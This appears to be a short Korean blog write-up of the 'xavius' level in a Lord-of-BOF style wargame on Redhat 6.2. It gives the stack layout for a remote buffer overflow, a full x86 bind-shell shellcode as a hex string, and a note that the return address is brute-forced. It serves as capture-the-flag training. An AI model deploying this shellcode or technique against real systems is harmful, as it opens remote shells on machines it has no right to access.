본문 바로가기

Wargames/Load Of BOF

LOB Redhat 6.2 - xavius


xavius - Remote BOF

Stack : sin_size[4] + client_addr[16] + server_addr[16] + client_id[4] + server_id[4] + buffer[40] + sfp[4] + ret[4]

bind shellcode : \x31\xc0\x31\xdb\xb0\x17\xcd\x80\x31\xdb\xf7\xe3\xb0\x66\x53\x43\x53\x43\x53\x89\xe1\x4b\xcd\x80\x89\xc7\x52\x66\x68\x7a\x69\x43\x66\x53\x89\xe1\xb0\x10\x50\x51\x57\x89\xe1\xb0\x66\xcd\x80\xb0\x66\xb3\x04\xcd\x80\x50\x50\x57\x89\xe1\x43\xb0\x66\xcd\x80\x89\xd9\x89\xc3\xb0\x3f\x49\xcd\x80\x41\xe2\xf8\x51\x68n/sh\x68//bi\x89\xe3\x51\x53\x89\xe1\xb0\x0b\xcd\x80

LOB20.py

return address : BruteForcing


Using Remote BOF

'Wargames > Load Of BOF' 카테고리의 다른 글

LOB Redhat 6.2 - nightmare  (0) 2015.11.02
LOB Redhat 6.2 - succubus  (0) 2015.11.02
LOB Redhat 6.2 - zombie_assassin  (0) 2015.10.30
LOB Redhat 6.2 - assassin  (0) 2015.10.30
LOB Redhat 6.2 - giant  (0) 2015.10.30